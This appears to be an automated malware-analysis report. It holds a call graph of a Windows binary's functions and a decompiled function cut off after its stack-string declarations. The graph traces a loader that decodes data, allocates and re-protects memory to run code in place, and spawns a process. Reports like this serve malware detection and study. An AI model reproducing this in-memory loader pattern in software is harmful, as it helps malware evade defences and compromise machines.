17372->17374 17375 7ff87c10bd7c new LeaveCriticalSection 17373->17375 17377 7ff87c10dfd2 17374->17377 17376 7ff87c10dfe3 17375->17376 17376->17306 17378 7ff87c10dea8 GetStdHandle GetFileType 17377->17378 17378->17373 17381 7ff87c107e1c 17380->17381 17383 7ff87c107de8 17380->17383 17381->17310 17382 7ff87c107e02 FreeLibrary 17382->17383 17383->17381 17383->17382 17385 7ff87c104022 17384->17385 17388 7ff87c103f7c __scrt_initialize_onexit_tables 17384->17388 17386 7ff87c104944 __scrt_fastfail 7 API calls 17385->17386 17387 7ff87c10402c 17386->17387 17388->17267 17390 7ff87c104141 _onexit 17389->17390 17391 7ff87c10414b 17389->17391 17390->17270 17393 7ff87c10a6bc 17391->17393 17396 7ff87c10a2f8 17393->17396 17403 7ff87c10bd28 EnterCriticalSection 17396->17403 17410 7ff87c10b890 17404->17410 17407 7ff87c106b08 17459 7ff87c106f4c 17407->17459 17411 7ff87c103e61 17410->17411 17412 7ff87c10b8a1 FlsGetValue 17410->17412 17411->17407 17412->17411 17413 7ff87c10b8ae FlsSetValue 17412->17413 17417 7ff87c10b730 17413->17417 17418 7ff87c10b77a 17417->17418 17419 7ff87c10b772 17417->17419 17421 7ff87c10a9dc __free_lconv_num 11 API calls 17418->17421 17420 7ff87c10a9dc __free_lconv_num 11 API calls 17419->17420 17420->17418 17422 7ff87c10b787 17421->17422 17423 7ff87c10a9dc __free_lconv_num 11 API calls 17422->17423 17424 7ff87c10b794 17423->17424 17425 7ff87c10a9dc __free_lconv_num 11 API calls 17424->17425 17426 7ff87c10b7a1 17425->17426 17427 7ff87c10a9dc __free_lconv_num 11 API calls 17426->17427 17428 7ff87c10b7ae 17427->17428 17429 7ff87c10a9dc __free_lconv_num 11 API calls 17428->17429 17430 7ff87c10b7bb 17429->17430 17431 7ff87c10a9dc __free_lconv_num 11 API calls 17430->17431 17432 7ff87c10b7c8 17431->17432 17433 7ff87c10a9dc __free_lconv_num 11 API calls 17432->17433 17434 7ff87c10b7d5 17433->17434 17435 7ff87c10a9dc __free_lconv_num 11 API calls 17434->17435 17436 7ff87c10b7e5 17435->17436 17437 7ff87c10a9dc __free_lconv_num 11 API calls 17436->17437 17438 7ff87c10b7f5 17437->17438 17443 7ff87c10b5e0 17438->17443 17457 7ff87c10bd28 EnterCriticalSection 17443->17457 17460 7ff87c103e66 17459->17460 17461 7ff87c106f60 17459->17461 17460->17197 17462 7ff87c106f6a 17461->17462 17467 7ff87c107c64 17461->17467 17463 7ff87c107cb8 __vcrt_FlsSetValue 6 API calls 17462->17463 17465 7ff87c106f7a 17463->17465 17465->17460 17466 7ff87c10a9dc __free_lconv_num 11 API calls 17465->17466 17466->17460 17468 7ff87c1079f4 try_get_function 5 API calls 17467->17468 17469 7ff87c107c8f 17468->17469 17470 7ff87c107ca5 TlsGetValue 17469->17470 17471 7ff87c107c97 17469->17471 17470->17471 17471->17462 17479 7ff87c10bd28 EnterCriticalSection 17472->17479 17644 7ff87c101710 17480->17644 17487 7ff87c101540 47 API calls 17488 7ff87c1199f7 17487->17488 17489 7ff87c102970 49 API calls 17488->17489 17490 7ff87c119a13 17489->17490 17491 7ff87c101580 49 API calls 17490->17491 17492 7ff87c119a2a 17491->17492 17493 7ff87c101540 47 API calls 17492->17493 17494 7ff87c119a37 17493->17494 17495 7ff87c102970 49 API calls 17494->17495 17496 7ff87c119a53 17495->17496 17497 7ff87c101580 49 API calls 17496->17497 17498 7ff87c119a6a 17497->17498 17499 7ff87c101540 47 API calls 17498->17499 17500 7ff87c119a77 17499->17500 17501 7ff87c102970 49 API calls 17500->17501 17502 7ff87c119a93 17501->17502 17503 7ff87c101580 49 API calls 17502->17503 17504 7ff87c119aaa 17503->17504 17505 7ff87c101540 47 API calls 17504->17505 17506 7ff87c119ab7 17505->17506 17507 7ff87c102970 49 API calls 17506->17507 17508 7ff87c119ad3 17507->17508 17509 7ff87c101580 49 API calls 17508->17509 17510 7ff87c119aea 17509->17510 17511 7ff87c101540 47 API calls 17510->17511 17512 7ff87c119af7 17511->17512 17513 7ff87c102970 49 API calls 17512->17513 17514 7ff87c119b13 17513->17514 17515 7ff87c101580 49 API calls 17514->17515 17516 7ff87c119b2a 17515->17516 17517 7ff87c101540 47 API calls 17516->17517 17518 7ff87c119b37 17517->17518 17519 7ff87c102970 49 API calls 17518->17519 17520 7ff87c119b53 17519->17520 17521 7ff87c101580 49 API calls 17520->17521 17522 7ff87c119b6a 17521->17522 17523 7ff87c101540 47 API calls 17522->17523 17524 7ff87c119b77 17523->17524 17525 7ff87c102970 49 API calls 17524->17525 17526 7ff87c119b93 17525->17526 17527 7ff87c101580 49 API calls 17526->17527 17528 7ff87c119baa 17527->17528 17529 7ff87c101540 47 API calls 17528->17529 17530 7ff87c119bb7 17529->17530 17531 7ff87c102970 49 API calls 17530->17531 17532 7ff87c119bd3 17531->17532 17533 7ff87c101580 49 API calls 17532->17533 17534 7ff87c119bea 17533->17534 17535 7ff87c101540 47 API calls 17534->17535 17536 7ff87c119bf7 17535->17536 17537 7ff87c102970 49 API calls 17536->17537 17538 7ff87c119c13 17537->17538 17539 7ff87c101580 49 API calls 17538->17539 17540 7ff87c119c2a 17539->17540 17541 7ff87c101540 47 API calls 17540->17541 17542 7ff87c119c37 17541->17542 17543 7ff87c102970 49 API calls 17542->17543 17544 7ff87c119c53 17543->17544 17545 7ff87c101580 49 API calls 17544->17545 17546 7ff87c119c6a 17545->17546 17547 7ff87c101540 47 API calls 17546->17547 17548 7ff87c119c77 17547->17548 17549 7ff87c102970 49 API calls 17548->17549 17550 7ff87c119c93 17549->17550 17551 7ff87c101580 49 API calls 17550->17551 17552 7ff87c119cb0 17551->17552 17553 7ff87c101540 47 API calls 17552->17553 17554 7ff87c119cbd 17553->17554 17555 7ff87c102970 49 API calls 17554->17555 17556 7ff87c119cd9 17555->17556 17557 7ff87c101580 49 API calls 17556->17557 17558 7ff87c119cf6 17557->17558 17559 7ff87c101540 47 API calls 17558->17559 17560 7ff87c119d03 17559->17560 17561 7ff87c102970 49 API calls 17560->17561 17562 7ff87c119d1f 17561->17562 17563 7ff87c101580 49 API calls 17562->17563 17564 7ff87c119d3c 17563->17564 17565 7ff87c101540 47 API calls 17564->17565 17566 7ff87c119d49 17565->17566 17567 7ff87c102970 49 API calls 17566->17567 17568 7ff87c119d65 17567->17568 17569 7ff87c101580 49 API calls 17568->17569 17570 7ff87c119d82 17569->17570 17571 7ff87c101540 47 API calls 17570->17571 17572 7ff87c119d8f 17571->17572 17573 7ff87c102970 49 API calls 17572->17573 17574 7ff87c119dab 17573->17574 17575 7ff87c101580 49 API calls 17574->17575 17576 7ff87c119dc8 17575->17576 17577 7ff87c101540 47 API calls 17576->17577 17578 7ff87c119dd5 17577->17578 17579 7ff87c102970 49 API calls 17578->17579 17580 7ff87c119df1 17579->17580 17581 7ff87c101580 49 API calls 17580->17581 17582 7ff87c119e0e 17581->17582 17583 7ff87c101540 47 API calls 17582->17583 17584 7ff87c119e1b 17583->17584 17585 7ff87c102970 49 API calls 17584->17585 17586 7ff87c119e37 17585->17586 17587 7ff87c101580 49 API calls 17586->17587 17588 7ff87c119e54 17587->17588 17589 7ff87c101540 47 API calls 17588->17589 17590 7ff87c119e61 17589->17590 17591 7ff87c102970 49 API calls 17590->17591 17592 7ff87c119e7d 17591->17592 17593 7ff87c101580 49 API calls 17592->17593 17594 7ff87c119e9a 17593->17594 17595 7ff87c101540 47 API calls 17594->17595 17596 7ff87c119ea7 17595->17596 17674 7ff87c1016a0 17596->17674 17599 7ff87c101540 47 API calls 17600 7ff87c119ed4 17599->17600 17601 7ff87c103a70 _UnwindNestedFrames 8 API calls 17600->17601 17602 7ff87c119eec 17601->17602 17602->17229 17604 7ff87c119437 CryptStringToBinaryA 17603->17604 17607 7ff87c119239 17603->17607 17605 7ff87c119476 new 17604->17605 17604->17607 17606 7ff87c1194b9 CryptStringToBinaryA 17605->17606 17605->17607 17606->17607 17608 7ff87c101540 17607->17608 17609 7ff87c101910 type_info::_name_internal_method 47 API calls 17608->17609 17610 7ff87c101561 Concurrency::details::WorkQueue::IsStructuredEmpty 17609->17610 17610->17235 17918 7ff87c1091b8 17611->17918 17614 7ff87c1091b8 47 API calls 17615 7ff87c11954e 17614->17615 17616 7ff87c1091b8 47 API calls 17615->17616 17617 7ff87c11955e VirtualAlloc 17616->17617 17618 7ff87c1193bd 17617->17618 17618->17247 17947 7ff87c119f40 17619->17947 17621 7ff87c119f11 17622 7ff87c11928c CoInitialize 17621->17622 17623 7ff87c119f24 ExitProcess 17621->17623 17622->17243 17622->17244 17624->17248 17626 7ff87c113d4c 17625->17626 17627 7ff87c113d53 RegisterTouchWindow 17625->17627 17626->17251 17626->17252 17628 7ff87c113d64 MessageBoxW 17627->17628 17629 7ff87c113d87 17627->17629 17628->17626 17630 7ff87c113d93 CoCreateInstance 17629->17630 17630->17626 17631 7ff87c113dc6 17630->17631 17971 7ff87c103d6c 17631->17971 17633 7ff87c113dd0 17633->17626 17634 7ff87c113e9b ShowWindow UpdateWindow 17633->17634 17634->17626 17636 7ff87c103a7a 17635->17636 17637 7ff87c103a86 17636->17637 17638 7ff87c103b04 IsProcessorFeaturePresent 17636->17638 17637->17181 17637->17183 17639 7ff87c103b1b 17638->17639 17985 7ff87c103cf8 RtlCaptureContext 17639->17985 17645 7ff87c101731 17644->17645 17680 7ff87c101910 17645->17680 17647 7ff87c101741 17684 7ff87c101b10 17647->17684 17650 7ff87c102970 17846 7ff87c101760 17650->17846 17652 7ff87c1029ad char_traits 17850 7ff87c102cc0 17652->17850 17654 7ff87c1029e2 17854 7ff87c102e90 17654->17854 17659 7ff87c1016a0 47 API calls 17660 7ff87c102a12 17659->17660 17661 7ff87c101540 47 API calls 17660->17661 17662 7ff87c102a27 17661->17662 17663 7ff87c103a70 _UnwindNestedFrames 8 API calls 17662->17663 17664 7ff87c102a39 17663->17664 17665 7ff87c101580 17664->17665 17666 7ff87c1015a7 17665->17666 17667 7ff87c101677 17665->17667 17668 7ff87c101910 type_info::_name_internal_method 47 API calls 17666->17668 17667->17487 17669 7ff87c1015b6 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::HardwareAffinity::operator!= 17668->17669 17670 7ff87c10167a 17669->17670 17671 7ff87c10163d 17669->17671 17887 7ff87c101f00 17670->17887 17883 7ff87c102a90 17671->17883 17675 7ff87c1016c1 Concurrency::details::WorkQueue::IsStructuredEmpty shared_ptr 17674->17675 17676 7ff87c101910 type_info::_name_internal_method 47 API calls 17675->17676 17677 7ff87c1016e8 17676->17677 17678 7ff87c101f00 47 API calls 17677->17678 17679 7ff87c101701 17678->17679 17679->17599 17681 7ff87c10192b type_info::_name_internal_method 17680->17681 17682 7ff87c101930 Concurrency::details::WorkQueue::IsStructuredEmpty Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17680->17682 17681->17647 17682->17681 17688 7ff87c102100 17682->17688 17685 7ff87c101b28 char_traits 17684->17685 17756 7ff87c101b40 17685->17756 17687 7ff87c101750 17687->17650 17691 7ff87c102880 17688->17691 17694 7ff87c1013a0 17691->17694 17693 7ff87c102127 17693->17681 17695 7ff87c1013cd 17694->17695 17696 7ff87c1013c8 17694->17696 17698 7ff87c10146b 17695->17698 17699 7ff87c101409 17695->17699 17700 7ff87c109764 _invalid_parameter_noinfo_noreturn 47 API calls 17695->17700 17706 7ff87c109764 17696->17706 17698->17693 17701 7ff87c101435 17699->17701 17702 7ff87c109764 _invalid_parameter_noinfo_noreturn 47 API calls 17699->17702 17700->17699 17703 7ff87c101450 17701->17703 17704 7ff87c109764 _invalid_parameter_noinfo_noreturn 47 API calls 17701->17704 17702->17701 17703->17698 17705 7ff87c109764 _invalid_parameter_noinfo_noreturn 47 API calls 17703->17705 17704->17703 17705->17698 17711 7ff87c1095d8 17706->17711 17712 7ff87c109603 17711->17712 17723 7ff87c109674 17712->17723 17714 7ff87c10962a 17715 7ff87c10964d 17714->17715 17733 7ff87c1090d0 17714->17733 17717 7ff87c109662 17715->17717 17718 7ff87c1090d0 _invalid_parameter_noinfo_noreturn 47 API calls 17715->17718 17719 7ff87c109794 IsProcessorFeaturePresent 17717->17719 17718->17717 17720 7ff87c1097a7 17719->17720 17748 7ff87c109474 17720->17748 17724 7ff87c1093bc _invalid_parameter_noinfo_noreturn 18 API calls 17723->17724 17725 7ff87c10969e 17724->17725 17726 7ff87c1096af 17725->17726 17727 7ff87c109428 _invalid_parameter_noinfo_noreturn GetLastError SetLastError 17725->17727 17726->17714 17728 7ff87c1096fb 17727->17728 17728->17726 17729 7ff87c109794 _invalid_parameter_noinfo_noreturn 17 API calls 17728->17729 17730 7ff87c109742 17729->17730 17731 7ff87c1095d8 _invalid_parameter_noinfo_noreturn 47 API calls 17730->17731 17732 7ff87c10975d 17731->17732 17732->17714 17734 7ff87c109128 17733->17734 17735 7ff87c1090df GetLastError 17733->17735 17734->17715 17736 7ff87c1090f4 17735->17736 17737 7ff87c10bb14 _invalid_parameter_noinfo_noreturn 16 API calls 17736->17737 17738 7ff87c10910e SetLastError 17737->17738 17738->17734 17739 7ff87c109131 17738->17739 17740 7ff87c10aa78 __FrameUnwindToState 45 API calls 17739->17740 17741 7ff87c109136 17740->17741 17742 7ff87c1090d0 _invalid_parameter_noinfo_noreturn 45 API calls 17741->17742 17743 7ff87c109157 17742->17743 17744 7ff87c10b474 _invalid_parameter_noinfo_noreturn 45 API calls 17743->17744 17745 7ff87c10917f 17744->17745 17746 7ff87c10b4e0 _invalid_parameter_noinfo_noreturn 45 API calls 17745->17746 17747 7ff87c10918f 17746->17747 17747->17715 17749 7ff87c1094ae __scrt_fastfail _invalid_parameter_noinfo_noreturn 17748->17749 17750 7ff87c1094d6 RtlCaptureContext RtlLookupFunctionEntry 17749->17750 17751 7ff87c109510 RtlVirtualUnwind 17750->17751 17752 7ff87c109546 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17750->17752 17751->17752 17754 7ff87c109598 _invalid_parameter_noinfo_noreturn 17752->17754 17753 7ff87c103a70 _UnwindNestedFrames 8 API calls 17755 7ff87c1095b7 GetCurrentProcess TerminateProcess 17753->17755 17754->17753 17757 7ff87c101b62 type_info::_name_internal_method 17756->17757 17758 7ff87c101b97 17757->17758 17759 7ff87c101b69 Concurrency::details::ContextBase::GetWorkQueueIdentity 17757->17759 17763 7ff87c1022b0 17758->17763 17772 7ff87c101bf0 17759->17772 17762 7ff87c101b95 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17762->17687 17764 7ff87c1022cd type_info::_name_internal_method 17763->17764 17765 7ff87c1022de type_info::_name_internal_method 17764->17765 17788 7ff87c102230 17764->17788 17767 7ff87c1022f2 type_info::_name_internal_method 17765->17767 17770 7ff87c102310 type_info::_name_internal_method 17765->17770 17782 7ff87c102600 17767->17782 17769 7ff87c10230e type_info::_name_internal_method 17769->17762 17770->17769 17771 7ff87c101910 type_info::_name_internal_method 47 API calls 17770->17771 17771->17769 17825 7ff87c1021f0 17772->17825 17774 7ff87c101c17 type_info::_name_internal_method 17775 7ff87c101c6c 17774->17775 17776 7ff87c101c3c 17774->17776 17778 7ff87c1022b0 type_info::_name_internal_method 49 API calls 17775->17778 17829 7ff87c102520 17776->17829 17781 7ff87c101c6a Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17778->17781 17779 7ff87c101c59 17832 7ff87c102450 17779->17832 17781->17762 17783 7ff87c102640 Concurrency::details::WorkQueue::IsStructuredEmpty type_info::_name_internal_method 17782->17783 17791 7ff87c1028e0 17783->17791 17785 7ff87c101910 type_info::_name_internal_method 47 API calls 17787 7ff87c1027c2 Concurrency::details::WorkQueue::IsStructuredEmpty construct type_info::_name_internal_method 17785->17787 17786 7ff87c102760 Concurrency::details::ContextBase::GetWorkQueueIdentity char_traits 17786->17785 17787->17769 17808 7ff87c104e9c 17788->17808 17794 7ff87c102930 17791->17794 17797 7ff87c1012b0 17794->17797 17798 7ff87c1012de 17797->17798 17807 7ff87c1012d4 17797->17807 17799 7ff87c1012f8 17798->17799 17800 7ff87c104e7c Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 17798->17800 17801 7ff87c10137c 17799->17801 17802 7ff87c10131c 17799->17802 17800->17799 17803 7ff87c103d6c new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 17801->17803 17804 7ff87c10133b 17802->17804 17805 7ff87c104e7c Concurrency::cancel_current_task RtlPcToFileHeader RaiseException 17802->17805 17803->17807 17806 7ff87c103d6c new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 17804->17806 17805->17804 17806->17807 17807->17786 17813 7ff87c104c70 17808->17813 17812 7ff87c104ebe 17821 7ff87c106d48 17813->17821 17815 7ff87c104ca7 17816 7ff87c106e00 17815->17816 17817 7ff87c106e6e RtlPcToFileHeader 17816->17817 17818 7ff87c106e4c 17816->17818 17819 7ff87c106e93 17817->17819 17820 7ff87c106eae RaiseException 17817->17820 17818->17817 17819->17820 17820->17812 17822 7ff87c106d9e __std_exception_copy 17821->17822 17823 7ff87c106d69 new 17821->17823 17822->17815 17823->17822 17824 7ff87c10a97c __std_exception_copy 47 API calls 17823->17824 17824->17822 17826 7ff87c102208 type_info::_name_internal_method 17825->17826 17827 7ff87c10221c 17826->17827 17835 7ff87c1025e0 17826->17835 17827->17774 17830 7ff87c1021f0 type_info::_name_internal_method 49 API calls 17829->17830 17831 7ff87c10253d type_info::_name_internal_method 17830->17831 17831->17779 17833 7ff87c1021f0 type_info::_name_internal_method 49 API calls 17832->17833 17834 7ff87c102472 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17833->17834 17834->17781 17838 7ff87c104ec0 17835->17838 17843 7ff87c104d3c 17838->17843 17841 7ff87c106e00 _CxxThrowException 2 API calls 17842 7ff87c104ee2 17841->17842 17844 7ff87c106d48 __std_exception_copy 47 API calls 17843->17844 17845 7ff87c104d73 17844->17845 17845->17841 17847 7ff87c10177c 17846->17847 17848 7ff87c101910 type_info::_name_internal_method 47 API calls 17847->17848 17849 7ff87c10178c 17848->17849 17849->17652 17851 7ff87c102cd8 type_info::_name_internal_method 17850->17851 17852 7ff87c1022b0 type_info::_name_internal_method 49 API calls 17851->17852 17853 7ff87c102d1a type_info::_name_internal_method 17851->17853 17852->17853 17853->17654 17860 7ff87c101510 17854->17860 17857 7ff87c102e60 17870 7ff87c1014e0 17857->17870 17863 7ff87c101df0 17860->17863 17862 7ff87c101537 17862->17857 17864 7ff87c1021f0 type_info::_name_internal_method 49 API calls 17863->17864 17865 7ff87c101e17 type_info::_name_internal_method 17864->17865 17866 7ff87c102230 _Mtx_guard::~_Mtx_guard 49 API calls 17865->17866 17867 7ff87c101e5b type_info::_name_internal_method 17865->17867 17866->17867 17868 7ff87c1022b0 type_info::_name_internal_method 49 API calls 17867->17868 17869 7ff87c101e8c Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17867->17869 17868->17869 17869->17862 17871 7ff87c1014f8 char_traits 17870->17871 17874 7ff87c101ce0 17871->17874 17873 7ff87c10150a 17873->17659 17875 7ff87c101d02 type_info::_name_internal_method 17874->17875 17876 7ff87c101d09 Concurrency::details::ContextBase::GetWorkQueueIdentity 17875->17876 17878 7ff87c101d3a type_info::_name_internal_method 17875->17878 17877 7ff87c101df0 type_info::_name_internal_method 49 API calls 17876->17877 17882 7ff87c101d35 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17877->17882 17879 7ff87c102230 _Mtx_guard::~_Mtx_guard 49 API calls 17878->17879 17880 7ff87c101d65 type_info::_name_internal_method 17878->17880 17879->17880 17881 7ff87c1022b0 type_info::_name_internal_method 49 API calls 17880->17881 17880->17882 17881->17882 17882->17873 17884 7ff87c102ab2 17883->17884 17891 7ff87c102d40 17884->17891 17888 7ff87c101f18 Concurrency::details::WorkQueue::IsStructuredEmpty construct type_info::_name_internal_method char_traits 17887->17888 17889 7ff87c101910 type_info::_name_internal_method 47 API calls 17888->17889 17890 7ff87c102016 17889->17890 17890->17667 17892 7ff87c102d6d 17891->17892 17893 7ff87c102d74 type_info::_name_internal_method 17892->17893 17896 7ff87c102dc1 type_info::_name_internal_method 17892->17896 17894 7ff87c102450 49 API calls 17893->17894 17895 7ff87c102af4 17894->17895 17895->17667 17898 7ff87c102fc0 17896->17898 17899 7ff87c102fea type_info::_name_internal_method 17898->17899 17900 7ff87c102ff1 Concurrency::details::ContextBase::GetWorkQueueIdentity 17899->17900 17901 7ff87c10303c 17899->17901 17909 7ff87c103240 17900->17909 17902 7ff87c1021f0 type_info::_name_internal_method 49 API calls 17901->17902 17903 7ff87c10304b type_info::_name_internal_method 17902->17903 17905 7ff87c102230 _Mtx_guard::~_Mtx_guard 49 API calls 17903->17905 17906 7ff87c1030aa Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17903->17906 17905->17906 17907 7ff87c1022b0 type_info::_name_internal_method 49 API calls 17906->17907 17908 7ff87c103037 Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17906->17908 17907->17908 17908->17895 17910 7ff87c1021f0 type_info::_name_internal_method 49 API calls 17909->17910 17911 7ff87c103270 17910->17911 17912 7ff87c1021f0 type_info::_name_internal_method 49 API calls 17911->17912 17913 7ff87c103285 type_info::_name_internal_method 17912->17913 17914 7ff87c102230 _Mtx_guard::~_Mtx_guard 49 API calls 17913->17914 17915 7ff87c103315 type_info::_name_internal_method 17913->17915 17914->17915 17916 7ff87c1022b0 type_info::_name_internal_method 49 API calls 17915->17916 17917 7ff87c10338e Concurrency::details::ContextBase::GetWorkQueueIdentity type_info::_name_internal_method char_traits 17915->17917 17916->17917 17917->17908 17919 7ff87c1091e8 17918->17919 17926 7ff87c10893c 17919->17926 17921 7ff87c10923c 17924 7ff87c109251 17921->17924 17925 7ff87c1090d0 _invalid_parameter_noinfo_noreturn 47 API calls 17921->17925 17923 7ff87c1090d0 _invalid_parameter_noinfo_noreturn 47 API calls 17923->17921 17924->17614 17925->17924 17927 7ff87c108947 17926->17927 17928 7ff87c108975 17927->17928 17929 7ff87c108987 17927->17929 17930 7ff87c10b420 _set_errno_from_matherr 11 API calls 17928->17930 17932 7ff87c108995 17929->17932 17936 7ff87c1089d1 17929->17936 17931 7ff87c10897a 17930->17931 17944 7ff87c109744 17931->17944 17934 7ff87c109674 _invalid_parameter_noinfo_noreturn 47 API calls 17932->17934 17939 7ff87c108985 17932->17939 17934->17939 17935 7ff87c108d5d 17937 7ff87c10b420 _set_errno_from_matherr 11 API calls 17935->17937 17935->17939 17936->17935 17938 7ff87c10b420 _set_errno_from_matherr 11 API calls 17936->17938 17940 7ff87c108ffd 17937->17940 17941 7ff87c108d52 17938->17941 17939->17921 17939->17923 17942 7ff87c109744 _invalid_parameter_noinfo 47 API calls 17940->17942 17943 7ff87c109744 _invalid_parameter_noinfo 47 API calls 17941->17943 17942->17939 17943->17935 17945 7ff87c1095d8 _invalid_parameter_noinfo_noreturn 47 API calls 17944->17945 17946 7ff87c10975d 17945->17946 17946->17939 17950 7ff87c11a250 17947->17950 17949 7ff87c119f51 17949->17621 17953 7ff87c11acc0 17950->17953 17952 7ff87c11a261 17952->17949 17956 7ff87c11b560 17953->17956 17955 7ff87c11acd1 17955->17952 17959 7ff87c11bc70 17956->17959 17958 7ff87c11b571 17958->17955 17962 7ff87c11c580 17959->17962 17961 7ff87c11bc81 17961->17958 17965 7ff87c11cf10 17962->17965 17964 7ff87c11c591 17964->17961 17968 7ff87c11d890 17965->17968 17967 7ff87c11cf21 17967->17964 17969 7ff87c11e020 8 API calls 17968->17969 17970 7ff87c11d8a1 17969->17970 17970->17967 17972 7ff87c103d77 new 17971->17972 17973 7ff87c103da2 17972->17973 17974 7ff87c1097ec new 2 API calls 17972->17974 17977 7ff87c10472c 17972->17977 17981 7ff87c10470c 17972->17981 17973->17633 17974->17972 17978 7ff87c10473a std::bad_alloc::bad_alloc 17977->17978 17979 7ff87c106e00 _CxxThrowException 2 API calls 17978->17979 17980 7ff87c10474b 17979->17980 17980->17972 17982 7ff87c10471a std::bad_alloc::bad_alloc 17981->17982 17983 7ff87c106e00 _CxxThrowException 2 API calls 17982->17983 17984 7ff87c10472b 17983->17984 17986 7ff87c103d12 RtlLookupFunctionEntry 17985->17986 17987 7ff87c103b2e 17986->17987 17988 7ff87c103d28 RtlVirtualUnwind 17986->17988 17989 7ff87c103ad0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17987->17989 17988->17986 17988->17987 17990 2c3232a0000 17993 2c3232a015a 17990->17993 17991 2c3232a033f GetNativeSystemInfo 17992 2c3232a0377 VirtualAlloc 17991->17992 17995 2c3232a08eb 17991->17995 17998 2c3232a0395 17992->17998 17993->17991 17993->17995 17994 2c3232a0873 17994->17995 17996 2c3232a08c6 RtlAvlRemoveNode 17994->17996 17996->17995 17997 2c3232a084b VirtualProtect 17997->17998 17998->17994 17998->17997 17999 7ff87c113f70 18002 7ff87c119600 17999->18002 18001 7ff87c113f97 ExitProcess 18003 7ff87c119758 18002->18003 18003->18001 18004 18000741c 18005 18000745d 18004->18005 18008 1800284b0 18005->18008 18007 1800075fe 18009 180028554 18008->18009 18010 180028653 CreateProcessW 18009->18010 18010->18007

                                                                                                      Control-flow Graph

                                                                                                      C-Code - Quality: 25%
                                                                                                      			E00007FF87FF87C113FB0(intOrPtr __edx, void* __edi, void* __esp, void* __rbx, long long __rcx, void* __rdx, void* __rdi, void* __rsi, long long __r8, long long _a8, intOrPtr _a16, long long _a24) {
                                                                                                      				signed int _v24;
                                                                                                      				char _v29;
                                                                                                      				char _v30;
                                                                                                      				char _v31;
                                                                                                      				char _v32;
                                                                                                      				char _v33;
                                                                                                      				char _v34;
                                                                                                      				char _v35;
                                                                                                      				char _v36;
                                                                                                      				char _v37;
                                                                                                      				char _v38;
                                                                                                      				char _v39;
                                                                                                      				char _v40;
                                                                                                      				char _v41;
                                                                                                      				char _v42;
                                                                                                      				char _v43;
                                                                                                      				char _v44;
                                                                                                      				char _v45;
                                                                                                      				char _v46;
                                                                                                      				char _v47;
                                                                                                      				char _v48;
                                                                                                      				char _v49;
                                                                                                      				char _v50;
                                                                                                      				char _v51;
                                                                                                      				char _v52;
                                                                                                      				char _v53;
                                                                                                      				char _v54;
                                                                                                      				char _v55;
                                                                                                      				char _v56;
                                                                                                      				char _v57;
                                                                                                      				char _v58;
                                                                                                      				char _v59;
                                                                                                      				char _v60;
                                                                                                      				char _v61;
                                                                                                      				char _v62;
                                                                                                      				char _v63;
                                                                                                      				char _v64;
                                                                                                      				char _v65;
                                                                                                      				char _v66;
                                                                                                      				char _v67;
                                                                                                      				char _v68;
                                                                                                      				char _v69;
                                                                                                      				char _v70;
                                                                                                      				char _v71;
                                                                                                      				char _v72;
                                                                                                      				char _v73;
                                                                                                      				char _v74;
                                                                                                      				char _v75;
                                                                                                      				char _v76;
                                                                                                      				char _v77;
                                                                                                      				char _v78;
                                                                                                      				char _v79;
                                                                                                      				char _v80;
                                                                                                      				char _v81;
                                                                                                      				char _v82;
                                                                                                      				char _v83;
                                                                                                      				char _v84;
                                                                                                      				char _v85;
                                                                                                      				char _v86;
                                                                                                      				char _v87;
                                                                                                      				char _v88;
                                                                                                      				char _v89;
                                                                                                      				char _v90;
                                                                                                      				char _v91;
                                                                                                      				char _v92;
                                                                                                      				char _v93;
                                                                                                      				char _v94;
                                                                                                      				char _v95;
                                                                                                      				char _v96;
                                                                                                      				char _v97;
                                                                                                      				char _v98;
                                                                                                      				char _v99;
                                                                                                      				char _v100;
                                                                                                      				char _v101;
                                                                                                      				char _v102;
                                                                                                      				char _v103;
                                                                                                      				char _v104;
                                                                                                      				char _v105;
                                                                                                      				char _v106;
                                                                                                      				char _v107;
                                                                                                      				char _v108;
                                                                                                      				char _v109;
                                                                                                      				char _v110;
                                                                                                      				char _v111;
                                                                                                      				char _v112;
                                                                                                      				char _v113;
                                                                                                      				char _v114;
                                                                                                      				char _v115;
                                                                                                      				char _v116;
                                                                                                      				char _v117;
                                                                                                      				char _v118;
                                                                                                      				char _v119;
                                                                                                      				char _v120;
                                                                                                      				char _v121;
                                                                                                      				char _v122;
                                                                                                      				char _v123;
                                                                                                      				char _v124;
                                                                                                      				char _v125;
                                                                                                      				char _v126;
                                                                                                      				char _v127;
                                                                                                      				char _v128;
                                                                                                      				char _v129;
                                                                                                      				char _v130;
                                                                                                      				char _v131;
                                                                                                      				char _v132;
                                                                                                      				char _v133;
                                                                                                      				char _v134;
                                                                                                      				char _v135;
                                                                                                      				char _v136;
                                                                                                      				char _v137;
                                                                                                      				char _v138;
                                                                                                      				char _v139;
                                                                                                      				char _v140;
                                                                                                      				char _v141;
                                                                                                      				char _v142;
                                                                                                      				char _v143;
                                                                                                      				char _v144;
                                                                                                      				char _v145;
                                                                                                      				char _v146;
                                                                                                      				char _v147;
                                                                                                      				char _v148;
                                                                                                      				char _v149;
                                                                                                      				char _v150;
                                                                                                      				char _v151;
                                                                                                      				char _v152;
                                                                                                      				char _v153;
                                                                                                      				char _v154;
                                                                                                      				char _v155;
                                                                                                      				char _v156;
                                                                                                      				char _v157;
                                                                                                      				char _v158;
                                                                                                      				char _v159;
                                                                                                      				char _v160;
                                                                                                      				char _v161;
                                                                                                      				char _v162;
                                                                                                      				char _v163;
                                                                                                      				char _v164;
                                                                                                      				char _v165;
                                                                                                      				char _v166;
                                                                                                      				char _v167;
                                                                                                      				char _v168;
                                                                                                      				char _v169;
                                                                                                      				char _v170;
